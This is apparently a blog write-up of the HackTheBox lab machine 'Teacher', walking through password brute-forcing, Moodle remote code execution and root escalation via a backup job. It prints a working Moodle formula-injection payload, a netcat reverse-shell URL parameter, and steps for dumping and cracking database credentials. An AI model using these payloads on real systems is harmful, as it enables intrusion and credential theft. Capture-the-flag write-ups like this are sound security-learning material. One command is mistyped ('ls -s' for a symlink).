Posted on by jonnygill

HTB Writeups: Teacher

Teacher

Teacher is my 30th machine on HackTheBox. User access is gained through finding partial credentials, fuzzing the password and then exploiting a hole in the Moodle software to leverage code execution and get a reverse shell. This initial access is then escalated from www-data to a userful user account using SQL database credentials found in a config file. Access to the root flag is then gained through a link made possible by a backup job modifying user access rights to a folder.

User Access

I started, as I always do, with the nmapautomator script that the wonderful 21yfd made available on GitHub and shared in the HTB forums. It’s a great timesaving tool and gives you a good start on your scans  (Available here).

Nmap tells us that port 80 is open, as well as a few other ports being filtered.

nmap

Gobuster returns some pages and folders that are worth looking into.

gobuster

None of the folders returned anything obviously useful at first glance, so attempts were made on the Moodle login. A few default user/password combinations found online were attempted with no luck. As can be seen above, the phpmyadmin page returned a forbidden code.

Even searching using the “big.txt” dirb wordlist and including .aspx and .txt file types did not return anything additional.

Looking on the “teachers” page on the website seems to make sense at this point to see if we can gather any information to log in with. This page actually takes us to the gallery though. None of the pictures do anything when clicked on, but one of the images is not displaying properly. Moving to the “images” page (10.10.10.153/images) allows us to check through each of the images in turn and, sure enough, 5.png returns an error.

5error

After some investigation, it became clear that this file was actually a text file, and opening in text editor revealed its contents.

5txt

We now have a potential username and all but one character of a password. We can use Crunch and Wfuzz to take advantage of this and try to bruteforce access.

crunchfuzz

We can now see that the password is “Th4C00lTheacha#” and with this we can access Moodle. With a little searching around for an exploit, the Evil Teacher exploit can be found (https://blog.ripstech.com/2018/moodle-remote-code-execution/) which allows execution of arbitrary code once authenticated.

From the Dashboard, clicking onto Past under Courses Overview allows us to access the Algebra course. From here, clicking on the Settings icon at the top right and then “More” brings us to the full settings page. From here we go to Questions, Create a New Question, Calculated, Add.

Make sure all of the required fields are filled and the answer formula should be:

1?><?=log(1){a.`$_GET[0]`.({x})}?>

The answer mark should be 100%. After this, click Save Changes, then on the next page click Next Page, and you reach the Algebra page shown below.

algebrapage

Now, set up a netcat listener on your machine (i.e. nc -nlvp 4444). On this Algebra page, add:

&0=(date;nc -e /bin/bash <your IP> <port>)

to the end of the URL and you should get a connection. After this, we can use python to spawn a nicer shell with the command:

python -c ‘import pty;pty.spawn(“/bin/bash”)’

pty

We are now connected as the user www-data. After a little bit of looking around the box in the folders that we have access to, we can find a Moodle config file in /var/www/html/moodle. This gives us database credentials!

moodleconfig

We can then use these to login to the database.

mysqlconnect

From here, we can investigate what databases are stored here, the most obvious of which to check is “moodle”, and then what tables are stored in that database. The most interesting of these for us is likely to be “mdl_user”

tables

We can extract the username and password from mdl_user with a SELECT statement.

dbuserpass

The backup Giovanni user’s password looks to be MD5 encrypted, so we can decrypt this easily using a website such as https://www.md5online.org/md5-decrypt.html and it returns the password “expelled”. With this we can switch user to giovanni and access the user.txt file.

usertxt

Privilege Escalation

The easiest place to look next is the “work” folder located in giovanni’s home folder.

giovannihome

In here is an archive “backup_courses.tar.gz” and nothing else of much use. Enumerating the machine further, however, reveals that there is a backup job running as root. This backup.sh file is found in /usr/bin.

usrbin

Looking into this file, we can see that it creates a backup of the “courses” folder and gives write access recursively to all users.

backupsh

From here, we can create a link between this folder and the root folder and give ourselves access that way using:

ls -s /root tmp

Then we just have to wait for the backup job to run again (my first attempt to access below failed because I was impatient) and then we successfully access /root and can read root.txt

roottxt

Leave a comment

Design a site like this with WordPress.com
Get started